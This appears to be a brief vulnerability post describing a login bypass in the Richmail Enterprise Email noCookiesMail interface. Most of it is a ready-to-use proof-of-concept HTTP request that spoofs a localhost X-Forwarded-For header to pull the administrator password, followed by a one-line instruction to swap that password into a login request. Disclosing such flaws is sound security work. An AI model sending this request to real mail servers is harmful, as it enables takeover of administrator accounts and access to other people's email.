Richmail Enterprise Email Nocookiesmail Login Bypass Vulnerability
Richmail Enterprise Email Nocookiesmail Login Bypass Vulnerability
Richmail Enterprise Email noCookiesMail Login bypass vulnerability
Vulnerability Description
Richmail Enterprise Email NoCookiesMail interface has a login bypass vulnerability. The attacker can obtain the administrator account and password to log in to the background through the vulnerability.
Vulnerability Impact
Richmail Corporate Email
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
2
3
4
5
GET /RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin HTTP/1.1
Host:
Cache-Control: max-age=0
Content-Type: Application/X-www-Form
x-forwarded-for: 127.0.0.1
Replace password field in login request to log in
This post is licensed under CC BY 4.0 by the author.